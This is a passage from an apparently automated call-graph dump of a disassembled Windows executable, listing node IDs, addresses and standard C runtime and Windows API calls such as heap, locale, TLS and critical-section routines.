f5f66a TlsFree 19392->19393 19394 f5f65e 19392->19394 19393->19394 19394->19389 19396 f64d3b 19395->19396 19400 f64d51 19395->19400 19396->19400 19401 f64d5e 19396->19401 19398 f64d48 19398->19400 19418 f64ec9 19398->19418 19400->19292 19402 f64d67 19401->19402 19403 f64d6a 19401->19403 19402->19398 19426 f6fedb 19403->19426 19408 f64d87 19459 f64db8 19408->19459 19409 f64d7b 19453 f681d7 19409->19453 19414 f681d7 ___free_lconv_mon 14 API calls 19415 f64dab 19414->19415 19416 f681d7 ___free_lconv_mon 14 API calls 19415->19416 19417 f64db1 19416->19417 19417->19398 19419 f64f3a 19418->19419 19420 f64ed8 19418->19420 19419->19400 19420->19419 19421 f6817a __dosmaperr 14 API calls 19420->19421 19423 f6ee2b WideCharToMultiByte _Fputc 19420->19423 19424 f64f3e 19420->19424 19425 f681d7 ___free_lconv_mon 14 API calls 19420->19425 19421->19420 19422 f681d7 ___free_lconv_mon 14 API calls 19422->19419 19423->19420 19424->19422 19425->19420 19427 f6fee4 19426->19427 19428 f64d70 19426->19428 19481 f6929c 19427->19481 19432 f701dd GetEnvironmentStringsW 19428->19432 19433 f701f5 19432->19433 19438 f64d75 19432->19438 19434 f6ee2b _Fputc WideCharToMultiByte 19433->19434 19435 f70212 19434->19435 19436 f70227 19435->19436 19437 f7021c FreeEnvironmentStringsW 19435->19437 19439 f694cc std::_Locinfo::_Locinfo_ctor 15 API calls 19436->19439 19437->19438 19438->19408 19438->19409 19440 f7022e 19439->19440 19441 f70247 19440->19441 19442 f70236 19440->19442 19443 f6ee2b _Fputc WideCharToMultiByte 19441->19443 19444 f681d7 ___free_lconv_mon 14 API calls 19442->19444 19445 f70257 19443->19445 19446 f7023b FreeEnvironmentStringsW 19444->19446 19447 f70266 19445->19447 19448 f7025e 19445->19448 19446->19438 19450 f681d7 ___free_lconv_mon 14 API calls 19447->19450 19449 f681d7 ___free_lconv_mon 14 API calls 19448->19449 19451 f70264 FreeEnvironmentStringsW 19449->19451 19450->19451 19451->19438 19454 f681e2 HeapFree 19453->19454 19455 f64d81 19453->19455 19454->19455 19456 f681f7 GetLastError 19454->19456 19455->19398 19457 f68204 __dosmaperr 19456->19457 19458 f61f44 __dosmaperr 12 API calls 19457->19458 19458->19455 19460 f64dcd 19459->19460 19461 f6817a __dosmaperr 14 API calls 19460->19461 19462 f64df4 19461->19462 19463 f64dfc 19462->19463 19469 f64e06 19462->19469 19464 f681d7 ___free_lconv_mon 14 API calls 19463->19464 19465 f64d8e 19464->19465 19465->19414 19466 f64e63 19467 f681d7 ___free_lconv_mon 14 API calls 19466->19467 19467->19465 19468 f6817a __dosmaperr 14 API calls 19468->19469 19469->19466 19469->19468 19470 f64e72 19469->19470 19475 f64e8d 19469->19475 19477 f681d7 ___free_lconv_mon 14 API calls 19469->19477 20100 f671e6 19469->20100 20109 f64e9a 19470->20109 19474 f681d7 ___free_lconv_mon 14 API calls 19476 f64e7f 19474->19476 19478 f61e5d __Getctype 11 API calls 19475->19478 19479 f681d7 ___free_lconv_mon 14 API calls 19476->19479 19477->19469 19480 f64e99 19478->19480 19479->19465 19482 f692a7 19481->19482 19483 f692ad 19481->19483 19529 f686c3 19482->19529 19502 f692b3 19483->19502 19534 f68702 19483->19534 19491 f692f4 19493 f68702 __dosmaperr 6 API calls 19491->19493 19492 f692df 19494 f68702 __dosmaperr 6 API calls 19492->19494 19496 f69300 19493->19496 19495 f692eb 19494->19495 19499 f681d7 ___free_lconv_mon 14 API calls 19495->19499 19497 f69304 19496->19497 19498 f69313 19496->19498 19500 f68702 __dosmaperr 6 API calls 19497->19500 19546 f6900f 19498->19546 19499->19502 19500->19495 19505 f692b8 19502->19505 19551 f5f7b3 19502->19551 19504 f681d7 ___free_lconv_mon 14 API calls 19504->19505 19506 f6fce6 19505->19506 19905 f6fe3b 19506->19905 19511 f6fd29 19511->19428 19513 f6fd3a 19514 f6fd42 19513->19514 19515 f6fd50 19513->19515 19516 f681d7 ___free_lconv_mon 14 API calls 19514->19516 19930 f6ff36 19515->19930 19516->19511 19519 f6fd88 19520 f61f44 __dosmaperr 14 API calls 19519->19520 19521 f6fd8d 19520->19521 19523 f681d7 ___free_lconv_mon 14 API calls 19521->19523 19522 f6fda3 19524 f681d7 ___free_lconv_mon 14 API calls 19522->19524 19527 f6fdcf 19522->19527 19523->19511 19524->19527 19526 f681d7 ___free_lconv_mon 14 API calls 19526->19511 19528 f6fe18 19527->19528 19941 f6f958 19527->19941 19528->19526 19577 f684b2 19529->19577 19531 f686df 19532 f686fa TlsGetValue 19531->19532 19533 f686e8 19531->19533 19533->19483 19535 f684b2 std::_Lockit::_Lockit 5 API calls 19534->19535 19536 f6871e 19535->19536 19537 f68727 19536->19537 19538 f6873c TlsSetValue 19536->19538 19537->19502 19539 f6817a 19537->19539 19544 f68187 __dosmaperr 19539->19544 19540 f681c7 19594 f61f44 19540->19594 19541 f681b2 RtlAllocateHeap 19542 f681c5 19541->19542 19541->19544 19542->19491 19542->19492 19544->19540 19544->19541 19591 f66c7f 19544->19591 19631 f68ea3 19546->19631 19733 f67a10 19551->19733 19554 f5f7c3 19556 f5f7cd IsProcessorFeaturePresent 19554->19556 19557 f5f7ec 19554->19557 19558 f5f7d9 19556->19558 19559 f6535e std::locale::_Setgloballocale 23 API calls 19557->19559 19763 f61c34 19558->19763 19561 f5f7f6 __FrameHandler3::FrameUnwindToState 19559->19561 19562 f5f80a 19561->19562 19565 f5f82a 19561->19565 19563 f61f44 __dosmaperr 14 API calls 19562->19563 19564 f5f80f 19563->19564 19769 f61e30 19564->19769 19567 f5f83c 19565->19567 19568 f5f82f 19565->19568 19772 f67c48 19567->19772 19571 f61f44 __dosmaperr 14 API calls 19568->19571 19570 f5f81a 19571->19570 19573 f5f84c 19575 f61f44 __dosmaperr 14 API calls 19573->19575 19574 f5f859 19780 f5f897 19574->19780 19575->19570 19578 f684e0 19577->19578 19582 f684dc std::_Lockit::_Lockit 19577->19582 19578->19582 19583 f683e7 19578->19583 19581 f684fa GetProcAddress 19581->19582 19582->19531 19584 f683f8 ___vcrt_FlsGetValue 19583->19584 19585 f6848e 19584->19585 19586 f68416 LoadLibraryExW 19584->19586 19590 f68464 LoadLibraryExW 19584->19590 19585->19581 19585->19582 19587 f68495 19586->19587 19588 f68431 GetLastError 19586->19588 19587->19585 19589 f684a7 FreeLibrary 19587->19589 19588->19584 19589->19585 19590->19584 19590->19587 19597 f66cac 19591->19597 19608 f69332 GetLastError 19594->19608 19596 f61f49 19596->19542 19598 f66cb8 __FrameHandler3::FrameUnwindToState 19597->19598 19603 f61f98 EnterCriticalSection 19598->19603 19600 f66cc3 19604 f66cff 19600->19604 19603->19600 19607 f61fe0 LeaveCriticalSection 19604->19607 19606 f66c8a 19606->19544 19607->19606 19609 f6934e 19608->19609 19610 f69348 19608->19610 19612 f68702 __dosmaperr 6 API calls 19609->19612 19614 f69352 SetLastError 19609->19614 19611 f686c3 __dosmaperr 6 API calls 19610->19611 19611->19609 19613 f6936a 19612->19613 19613->19614 19616 f6817a __dosmaperr 12 API calls 19613->19616 19614->19596 19617 f6937f 19616->19617 19618 f69387 19617->19618 19619 f69398 19617->19619 19621 f68702 __dosmaperr 6 API calls 19618->19621 19620 f68702 __dosmaperr 6 API calls 19619->19620 19622 f693a4 19620->19622 19628 f69395 19621->19628 19623 f693bf 19622->19623 19624 f693a8 19622->19624 19627 f6900f __dosmaperr 12 API calls 19623->19627 19625 f68702 __dosmaperr 6 API calls 19624->19625 19625->19628 19626 f681d7 ___free_lconv_mon 12 API calls 19626->19614 19629 f693ca 19627->19629 19628->19626 19630 f681d7 ___free_lconv_mon 12 API calls 19629->19630 19630->19614 19632 f68eaf __FrameHandler3::FrameUnwindToState 19631->19632 19645 f61f98 EnterCriticalSection 19632->19645 19634 f68eb9 19646 f68ee9 19634->19646 19637 f68fb5 19638 f68fc1 __FrameHandler3::FrameUnwindToState 19637->19638 19650 f61f98 EnterCriticalSection 19638->19650 19640 f68fcb 19651 f69196 19640->19651 19642 f68fe3 19655 f69003 19642->19655 19645->19634 19649 f61fe0 LeaveCriticalSection 19646->19649 19648 f68ed7 19648->19637 19649->19648 19650->19640 19652 f691cc __Getctype 19651->19652 19653 f691a5 __Getctype 19651->19653 19652->19642 19653->19652 19658 f71799 19653->19658 19732 f61fe0 LeaveCriticalSection 19655->19732 19657 f68ff1 19657->19504 19659 f71819 19658->19659 19664 f717af 19658->19664 19661 f681d7 ___free_lconv_mon 14 API calls 19659->19661 19684 f71867 19659->19684 19662 f7183b 19661->19662 19663 f681d7 ___free_lconv_mon 14 API calls 19662->19663 19664->19659 19665 f681d7 ___free_lconv_mon 14 API calls 19664->19665 19680 f717e2 19664->19680 19669 f717d7 19665->19669 19667 f681d7 ___free_lconv_mon 14 API calls 19686 f70a4f 19669->19686 19671 f681d7 ___free_lconv_mon 14 API calls 19677 f717f9 19671->19677 19680->19671 19685 f71804 19680->19685 19726 f7190a 19684->19726 19685->19667 19727 f71917 19726->19727 19731 f71936 19726->19731 19727->19731 19732->19657 19784 f67942 19733->19784 19736 f67a55 19737 f67a61 __FrameHandler3::FrameUnwindToState 19736->19737 19738 f67a88 std::locale::_Setgloballocale 19737->19738 19739 f69332 __dosmaperr 14 API calls 19737->19739 19742 f67a8e std::locale::_Setgloballocale 19737->19742 19740 f67ad5 19738->19740 19738->19742 19762 f67abf 19738->19762 19739->19738 19741 f61f44 __dosmaperr 14 API calls 19740->19741 19743 f67ada 19741->19743 19745 f67b01 19742->19745 19795 f61f98 EnterCriticalSection 19742->19795 19744 f61e30 _Ungetc 44 API calls 19743->19744 19744->19762 19747 f67c34 19745->19747 19748 f67b43 19745->19748 19759 f67b72 19745->19759 19751 f67c3f 19747->19751 19827 f61fe0 LeaveCriticalSection 19747->19827 19748->19759 19796 f691e1 GetLastError 19748->19796 19753 f6535e std::locale::_Setgloballocale 23 API calls 19751->19753 19755 f67c47 19753->19755 19756 f691e1 _unexpected 44 API calls 19760 f67bc7 19756->19760 19758 f691e1 _unexpected 44 API calls 19758->19759 19823 f67be1 19759->19823 19761 f691e1 _unexpected 44 API calls 19760->19761 19760->19762 19761->19762 19762->19554 19764 f61c50 codecvt std::locale::_Setgloballocale 19763->19764 19765 f61c7c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19764->19765 19766 f61d4d std::locale::_Setgloballocale 19765->19766 19829 f5aff0 19766->19829 19768 f61d6b 19768->19557 19837 f61d7c 19769->19837 19773 f67c54 __FrameHandler3::FrameUnwindToState 19772->19773 19878 f61f98 EnterCriticalSection 19773->19878 19775 f67c62 19879 f67cec 19775->19879 19781 f5f89b 19780->19781 19904 f5f9fd LeaveCriticalSection 19781->19904 19783 f5f8ac 19783->19570 19785 f6794e __FrameHandler3::FrameUnwindToState 19784->19785 19790 f61f98 EnterCriticalSection 19785->19790 19787 f6795c 19791 f6799a 19787->19791 19790->19787 19794 f61fe0 LeaveCriticalSection 19791->19794 19793 f5f7b8 19793->19554 19793->19736 19794->19793 19795->19745 19797 f691f7 19796->19797 19798 f691fd 19796->19798 19799 f686c3 __dosmaperr 6 API calls 19797->19799 19800 f68702 __dosmaperr 6 API calls 19798->19800 19802 f69201 SetLastError 19798->19802 19799->19798 19801 f69219 19800->19801 19801->19802 19804 f6817a __dosmaperr 14 API calls 19801->19804 19806 f69296 19802->19806 19807 f67b67 19802->19807 19805 f6922e 19804->19805 19809 f69236 19805->19809 19810 f69247 19805->19810 19808 f5f7b3 __purecall 42 API calls 19806->19808 19807->19758 19812 f6929b 19808->19812 19813 f68702 __dosmaperr 6 API calls 19809->19813 19811 f68702 __dosmaperr 6 API calls 19810->19811 19814 f69253 19811->19814 19815 f69244 19813->19815 19816 f69257 19814->19816 19817 f6926e 19814->19817 19819 f681d7 ___free_lconv_mon 14 API calls 19815->19819 19818 f68702 __dosmaperr 6 API calls 19816->19818 19820 f6900f __dosmaperr 14 API calls 19817->19820 19818->19815 19819->19802 19821 f69279 19820->19821 19822 f681d7 ___free_lconv_mon 14 API calls 19821->19822 19822->19802 19824 f67be7 19823->19824 19825 f67bb8 19823->19825 19828 f61fe0 LeaveCriticalSection 19824->19828 19825->19756 19825->19760 19825->19762 19827->19751 19828->19825 19830 f5aff9 IsProcessorFeaturePresent 19829->19830 19831 f5aff8 19829->19831 19833 f5bc42 19830->19833 19831->19768 19836 f5bc05 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19833->19836 19835 f5bd25 19835->19768 19836->19835 19838 f61d8e _Fputc 19837->19838 19843 f61db3 19838->19843 19840 f61da6 19854 f5fa59 19840->19854 19844 f61dc3 19843->19844 19845 f61dca 19843->19845 19860 f5fbba GetLastError 19844->19860 19849 f61dd8 19845->19849 19864 f61c0b 19845->19864 19848 f61dff 19848->19849 19867 f61e5d IsProcessorFeaturePresent 19848->19867 19849->19840 19851 f61e2f 19852 f61d7c _Ungetc 44 API calls 19851->19852 19855 f5fa65 19854->19855 19857 f5fa7c 19855->19857 19871 f5fc00 19855->19871 19858 f5fa8f 19857->19858 19859 f5fc00 _Fputc 44 API calls 19857->19859 19858->19570 19859->19858 19861 f5fbd3 19860->19861 19862 f693e3 _Fputc 14 API calls 19861->19862 19863 f5fbeb SetLastError 19862->19863 19863->19845 19865 f61c16 GetLastError SetLastError 19864->19865 19866 f61c2f 19864->19866 19865->19848 19866->19848 19868 f61e69 19867->19868 19869 f61c34 std::locale::_Setgloballocale 8 API calls 19868->19869 19870 f61e7e GetCurrentProcess TerminateProcess 19869->19870 19870->19851 19872 f5fc13 19871->19872 19873 f5fc0a 19871->19873 19872->19857 19874 f5fbba _Fputc 16 API calls 19873->19874 19875 f5fc0f 19874->19875 19875->19872 19876 f5f7b3 __purecall 44 API calls 19875->19876 19878->19775 19880 f67d0f 19879->19880 19881 f67d67 19880->19881 19888 f67c6f 19880->19888 19895 f5f9e9 EnterCriticalSection 19880->19895 19896 f5f9fd LeaveCriticalSection 19880->19896 19882 f6817a __dosmaperr 14 API calls 19881->19882 19883 f67d70 19882->19883 19885 f681d7 ___free_lconv_mon 14 API calls 19883->19885 19886 f67d79 19885->19886 19886->19888 19897 f687bf 19886->19897 19892 f67ca8 19888->19892 19903 f61fe0 LeaveCriticalSection 19892->19903 19894 f5f845 19894->19573 19894->19574 19895->19880 19896->19880 19898 f684b2 std::_Lockit::_Lockit 5 API calls 19897->19898 19899 f687db 19898->19899 19903->19894 19904->19783 19906 f6fe47 __FrameHandler3::FrameUnwindToState 19905->19906 19907 f6fe61 19906->19907 19949 f61f98 EnterCriticalSection 19906->19949 19909 f6fd10 19907->19909 19912 f5f7b3 __purecall 44 API calls 19907->19912 19916 f6fa66 19909->19916 19910 f6fe9d 19950 f6feba 19910->19950 19913 f6feda 19912->19913 19914 f6fe71 19914->19910 19915 f681d7 ___free_lconv_mon 14 API calls 19914->19915 19915->19910 19954 f63abd 19916->19954 19919 f6fa87 GetOEMCP 19922 f6fab0 19919->19922 19920 f6fa99 19921 f6fa9e GetACP 19920->19921 19920->19922 19921->19922 19922->19511 19923 f694cc 19922->19923 19924 f6950a 19923->19924 19928 f694da __dosmaperr 19923->19928 19926 f61f44 __dosmaperr 14 API calls 19924->19926 19925 f694f5 HeapAlloc 19927 f69508 19925->19927 19925->19928 19926->19927 19927->19513 19928->19924 19928->19925 19929 f66c7f codecvt 2 API calls 19928->19929 19929->19928 19931 f6fa66 46 API calls 19930->19931 19932 f6ff56 19931->19932 19934 f6ff93 IsValidCodePage 19932->19934 19939 f6ffcf codecvt 19932->19939 19933 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19935 f6fd7d 19933->19935 19936 f6ffa5 19934->19936 19934->19939 19935->19519 19935->19522 19937 f6ffd4 GetCPInfo 19936->19937 19938 f6ffae codecvt 19936->19938 19937->19938 19937->19939 19996 f6fb3a 19938->19996 19939->19933 19942 f6f964 __FrameHandler3::FrameUnwindToState 19941->19942 20074 f61f98 EnterCriticalSection 19942->20074 19944 f6f96e 19949->19914 19953 f61fe0 LeaveCriticalSection 19950->19953 19952 f6fec1 19952->19907 19953->19952 19955 f63ad4 19954->19955 19956 f63adb 19954->19956 19955->19919 19955->19920 19956->19955 19957 f691e1 _unexpected 44 API calls 19956->19957 19958 f63afc 19957->19958 19962 f6951a 19958->19962 19963 f63b12 19962->19963 19964 f6952d 19962->19964 19966 f69578 19963->19966 19964->19963 19970 f719e5 19964->19970 19967 f695a0 19966->19967 19968 f6958b 19966->19968 19967->19955 19968->19967 19991 f6ff23 19968->19991 19971 f719f1 __FrameHandler3::FrameUnwindToState 19970->19971 19972 f691e1 _unexpected 44 API calls 19971->19972 19973 f719fa 19972->19973 19974 f71a40 19973->19974 19983 f61f98 EnterCriticalSection 19973->19983 19974->19963 19976 f71a18 19984 f71a66 19976->19984 19981 f5f7b3 __purecall 44 API calls 19982 f71a65 19981->19982 19983->19976 19985 f71a74 __Getctype 19984->19985 19987 f71a29 19984->19987 19986 f71799 __Getctype 14 API calls 19985->19986 19985->19987 19986->19987 19988 f71a45 19987->19988 19989 f61fe0 std::_Lockit::~_Lockit LeaveCriticalSection 19988->19989 19990 f71a3c 19989->19990 19990->19974 19990->19981 19992 f691e1 _unexpected 44 API calls 19991->19992 19993 f6ff28 19992->19993 19994 f6fe3b __wsopen_s 44 API calls 19993->19994 19995 f6ff33 19994->19995 19995->19967 19997 f6fb62 GetCPInfo 19996->19997 20006 f6fc2b 19996->20006 20003 f6fb7a 19997->20003 19997->20006 19999 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20001 f6fce4 19999->20001 20001->19939 20007 f6cb48 20003->20007 20006->19999 20008 f63abd __wsopen_s 44 API calls 20007->20008 20009 f6cb68 20008->20009 20074->19944 20101 f671f4 20100->20101 20102 f67202 20100->20102 20101->20102 20107 f6721a 20101->20107 20103 f61f44 __dosmaperr 14 API calls 20102->20103 20104 f6720a 20103->20104 20105 f61e30 _Ungetc 44 API calls 20104->20105 20106 f67214 20105->20106 20106->19469 20107->20106 20108 f61f44 __dosmaperr 14 API calls 20107->20108 20108->20104 20110 f64e78 20109->20110 20111 f64ea7 20109->20111 20110->19474 20112 f64ebe 20111->20112 20113 f681d7 ___free_lconv_mon 14 API calls 20111->20113 20114 f681d7 ___free_lconv_mon 14 API calls 20112->20114 20113->20111 20114->20110 20163 f5b1e3 20115->20163 20117 f54c93 codecvt 20118 f54cb2 LoadLibraryW 20117->20118 20173 f53860 20118->20173 20120 f54cd0 20121 f5b1e3 codecvt 16 API calls 20120->20121 20122 f54d11 codecvt 20121->20122 20231 f56ff0 20122->20231 20166 f5b1e8 20163->20166 20165 f5b202 20165->20117 20166->20165 20167 f66c7f codecvt 2 API calls 20166->20167 20169 f5b204 codecvt 20166->20169 20326 f61e91 20166->20326 20167->20166 20168 f5be1e codecvt 20170 f5c0d1 CallUnexpected RaiseException 20168->20170 20169->20168 20335 f5c0d1 20169->20335 20172 f5be3b 20170->20172 20176 f538a8 codecvt 20173->20176 20180 f54c00 codecvt 20173->20180 20174 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20175 f54c63 20174->20175 20175->20120 20176->20176 20177 f55e30 std::ios_base::_Init 46 API calls 20176->20177 20179 f54c02 20176->20179 20176->20180 20181 f54c67 20176->20181 20338 f51220 20176->20338 20177->20176 20179->20180 20179->20181 20180->20174 20182 f61e40 std::ios_base::_Init 44 API calls 20181->20182 20183 f54c6c 20182->20183 20184 f5b1e3 codecvt 16 API calls 20183->20184 20185 f54c93 codecvt 20184->20185 20186 f54cb2 LoadLibraryW 20185->20186 20187 f53860 129 API calls 20186->20187 20188 f54cd0 20187->20188 20189 f5b1e3 codecvt 16 API calls 20188->20189 20190 f54d11 codecvt 20189->20190 20191 f56ff0 72 API calls 20190->20191 20192 f54d32 20191->20192 20193 f55040 20192->20193 20194 f54d3c 20192->20194 20195 f533c0 46 API calls 20193->20195 20197 f53520 75 API calls 20194->20197 20196 f5504a 20195->20196 20198 f61e40 std::ios_base::_Init 44 API calls 20196->20198 20199 f54d75 20197->20199 20200 f5504f 20198->20200 20201 f55e30 std::ios_base::_Init 46 API calls 20199->20201 20202 f54db8 20201->20202 20203 f55ec0 std::ios_base::_Init 46 API calls 20202->20203 20204 f54dd4 codecvt 20202->20204 20203->20204 20205 f5f8ae 44 API calls 20204->20205 20206 f54e2b 20205->20206 20207 f61bb6 70 API calls 20206->20207 20208 f54e3f 20207->20208 20209 f5fc1d 72 API calls 20208->20209 20210 f54e45 20209->20210 20211 f55e30 std::ios_base::_Init 46 API calls 20210->20211 20212 f54e88 20211->20212 20213 f55ec0 std::ios_base::_Init 46 API calls 20212->20213 20214 f54ea4 codecvt 20212->20214 20213->20214 20215 f5f8ae 44 API calls 20214->20215 20599 f57120 20231->20599 20235 f57026 20236 f5706b 20235->20236 20627 f584d7 CoGetApartmentType 20235->20627 20620 f571b0 20236->20620 20327 f694cc 20326->20327 20328 f6950a 20327->20328 20329 f694f5 HeapAlloc 20327->20329 20330 f694de __dosmaperr 20327->20330 20331 f61f44 __dosmaperr 14 API calls 20328->20331 20329->20330 20332 f69508 20329->20332 20330->20328 20330->20329 20334 f66c7f codecvt 2 API calls 20330->20334 20333 f6950f 20331->20333 20332->20333 20333->20166 20334->20330 20336 f5c118 RaiseException 20335->20336 20337 f5c0eb 20335->20337 20336->20168 20337->20336 20339 f51232 20338->20339 20342 f6180e 20339->20342 20343 f61822 _Fputc 20342->20343 20344 f61844 20343->20344 20346 f6186b 20343->20346 20345 f61db3 _Fputc 44 API calls 20344->20345 20348 f6185f 20345->20348 20351 f5fc4d 20346->20351 20349 f5fa59 _Fputc 44 API calls 20348->20349 20350 f5124c 20349->20350 20350->20176 20352 f5fc59 __FrameHandler3::FrameUnwindToState 20351->20352 20359 f5f9e9 EnterCriticalSection 20352->20359 20354 f5fc67 20360 f607fe 20354->20360 20359->20354 20374 f6a47e 20360->20374 20362 f60825 20383 f60a09 20362->20383 20405 f6a443 20374->20405 20376 f6a508 20376->20362 20377 f6a48f 20377->20376 20378 f6a4df 20377->20378 20379 f694cc std::_Locinfo::_Locinfo_ctor 15 API calls 20378->20379 20380 f6a4e9 20379->20380 20381 f681d7 ___free_lconv_mon 14 API calls 20380->20381 20382 f6a4f2 20381->20382 20382->20376 20427 f61626 20383->20427 20386 f60a32 20387 f61db3 _Fputc 44 API calls 20386->20387 20388 f6086c 20387->20388 20398 f607c0 20388->20398 20393 f60a5d std::_Locinfo::_Locinfo_ctor 20393->20388 20394 f60c3a 20393->20394 20433 f615b0 20393->20433 20440 f60991 20393->20440 20443 f60cb5 20393->20443 20477 f60e13 20393->20477 20395 f61db3 _Fputc 44 API calls 20394->20395 20396 f60c56 20395->20396 20397 f61db3 _Fputc 44 API calls 20396->20397 20397->20388 20399 f681d7 ___free_lconv_mon 14 API calls 20398->20399 20400 f607d0 20399->20400 20401 f6a52a 20400->20401 20402 f60886 20401->20402 20403 f6a535 20401->20403 20403->20402 20407 f6a44f 20405->20407 20406 f6a470 20406->20377 20407->20406 20411 f68c78 20407->20411 20409 f6a46a 20418 f7596d 20409->20418 20412 f68c84 20411->20412 20413 f68c99 20411->20413 20414 f61f44 __dosmaperr 14 API calls 20412->20414 20413->20409 20415 f68c89 20414->20415 20416 f61e30 _Ungetc 44 API calls 20415->20416 20417 f68c94 20416->20417 20417->20409 20419 f75987 20418->20419 20420 f7597a 20418->20420 20422 f75993 20419->20422 20423 f61f44 __dosmaperr 14 API calls 20419->20423 20421 f61f44 __dosmaperr 14 API calls 20420->20421 20424 f7597f 20421->20424 20422->20406 20425 f759b4 20423->20425 20424->20406 20426 f61e30 _Ungetc 44 API calls 20425->20426 20426->20424 20428 f61653 20427->20428 20429 f61631 20427->20429 20506 f6165e 20428->20506 20430 f61db3 _Fputc 44 API calls 20429->20430 20432 f60a24 20430->20432 20432->20386 20432->20388 20432->20393 20434 f5fc00 _Fputc 44 API calls 20433->20434 20435 f615c0 20434->20435 20514 f69547 20435->20514 20522 f5fda3 20440->20522 20444 f60cd3 20443->20444 20445 f60cbc 20443->20445 20446 f60d12 20444->20446 20449 f61db3 _Fputc 44 API calls 20444->20449 20445->20446 20447 f60e37 20445->20447 20448 f60ea8 20445->20448 20446->20393 20452 f60ed5 20447->20452 20453 f60e3d 20447->20453 20450 f60ead 20448->20450 20451 f60efb 20448->20451 20454 f60d07 20449->20454 20455 f60eef 20450->20455 20456 f60eaf 20450->20456 20451->20452 20459 f60e7a 20451->20459 20476 f60e5f 20451->20476 20551 f6014d 20452->20551 20453->20459 20462 f60e43 20453->20462 20454->20393 20462->20476 20478 f60e37 20477->20478 20479 f60ea8 20477->20479 20482 f60ed5 20478->20482 20483 f60e3d 20478->20483 20480 f60ead 20479->20480 20481 f60efb 20479->20481 20484 f60eef 20480->20484 20485 f60eaf 20480->20485 20481->20482 20490 f60e7a 20481->20490 20504 f60e5f 20481->20504 20486 f6014d 45 API calls 20482->20486 20483->20490 20491 f60e43 20483->20491 20489 f614c9 45 API calls 20484->20489 20487 f60eb4 20485->20487 20488 f60e51 20485->20488 20486->20504 20487->20482 20493 f60eb9 20487->20493 20492 f61209 47 API calls 20488->20492 20488->20504 20505 f60e73 20488->20505 20489->20504 20495 f602ca 45 API calls 20490->20495 20490->20505 20491->20488 20494 f60e8f 20491->20494 20491->20504 20492->20504 20499 f61393 46 API calls 20494->20499 20494->20505 20495->20504 20499->20504 20500 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20503 f6a120 _Fputc 46 API calls 20503->20504 20504->20503 20504->20505 20505->20500 20507 f61672 20506->20507 20509 f616dc 20506->20509 20508 f68c78 _Ungetc 44 API calls 20507->20508 20510 f61679 20508->20510 20509->20432 20510->20509 20511 f61f44 __dosmaperr 14 API calls 20510->20511 20512 f616d1 20511->20512 20513 f61e30 _Ungetc 44 API calls 20512->20513 20513->20509 20515 f615dd 20514->20515 20516 f6955e 20514->20516 20518 f695a5 20515->20518 20516->20515 20517 f719e5 __Getctype 44 API calls 20516->20517 20517->20515 20523 f6160b std::_Locinfo::_Locinfo_ctor 44 API calls 20522->20523 20524 f5fdb5 20523->20524 20525 f5fdca 20524->20525 20528 f5fdfd 20524->20528 20531 f5fde5 std::_Locinfo::_Locinfo_ctor 20524->20531 20552 f60161 20551->20552 20600 f57139 20599->20600 20631 f5a6f5 20600->20631 20604 f57002 20605 f52370 InitOnceBeginInitialize 20604->20605 20606 f52396 20605->20606 20607 f523e2 20605->20607 20608 f523ce 20606->20608 20610 f523b1 InitOnceComplete 20606->20610 20637 f5b10d EnterCriticalSection 20606->20637 20609 f5f7b3 __purecall 44 API calls 20607->20609 20611 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20608->20611 20609->20606 20610->20608 20616 f52416 20610->20616 20612 f523de 20611->20612 20612->20235 20614 f523f1 20614->20610 20642 f5b44f 20614->20642 20616->20235 20699 f55d00 20620->20699 20622 f571ce 20710 f57230 20622->20710 20628 f5705f 20627->20628 20628->20236 20629 f584bf CoGetObjectContext 20628->20629 20630 f584d2 20629->20630 20630->20236 20636 f5a4b2 InitializeConditionVariable 20631->20636 20633 f57144 20634 f58a79 20633->20634 20635 f589d3 InitializeConditionVariable 20634->20635 20635->20604 20636->20633 20638 f5b121 20637->20638 20639 f5b126 LeaveCriticalSection 20638->20639 20650 f5b195 20638->20650 20639->20614 20655 f5b422 20642->20655 20645 f5b0c3 EnterCriticalSection LeaveCriticalSection 20646 f5b15f 20645->20646 20651 f5b1a3 SleepConditionVariableCS 20650->20651 20652 f5b1bc LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 20650->20652 20653 f5b1e0 20651->20653 20652->20653 20653->20638 20656 f5b431 20655->20656 20657 f5b438 20655->20657 20661 f66f9a 20656->20661 20664 f67017 20657->20664 20660 f52407 20660->20645 20662 f67017 47 API calls 20661->20662 20663 f66fac 20662->20663 20663->20660 20667 f66d63 20664->20667 20668 f66d6f __FrameHandler3::FrameUnwindToState 20667->20668 20675 f61f98 EnterCriticalSection 20668->20675 20670 f66d7d 20675->20670 20700 f55d27 20699->20700 20701 f55d9c codecvt 20699->20701 20702 f55d33 20700->20702 20703 f55e19 20700->20703 20701->20622 20705 f55e1e 20702->20705 20706 f55d74 codecvt 20702->20706 20744 f56550 20703->20744 20707 f61e40 std::ios_base::_Init 44 API calls 20705->20707 20729 f56560 20706->20729 20709 f55e23 20707->20709 20711 f5725d 20710->20711 20774 f55420 20711->20774 20730 f565d6 20729->20730 20731 f56570 20729->20731 20747 f513c0 20730->20747 20733 f565a9 20731->20733 20734 f5657b 20731->20734 20734->20730 20761 f58cdc 20744->20761 20748 f513cb codecvt 20747->20748 20766 f58c73 20761->20766 20769 f51260 20766->20769 20770 f5be7b ___std_exception_copy 45 API calls 20769->20770 20775 f55435 20774->20775 21400 f651c1 21399->21400 21401 f651af 21399->21401 21411 f6504a 21400->21411 21426 f6524a GetModuleHandleW 21401->21426 21406 f5afdd 21406->19322 21412 f65056 __FrameHandler3::FrameUnwindToState 21411->21412 21434 f61f98 EnterCriticalSection 21412->21434 21414 f65060 21435 f65097 21414->21435 21416 f6506d 21439 f6508b 21416->21439 21419 f65219 21464 f6528d 21419->21464 21422 f65237 21424 f652af std::locale::_Setgloballocale 3 API calls 21422->21424 21423 f65227 GetCurrentProcess TerminateProcess 21423->21422 21425 f6523f ExitProcess 21424->21425 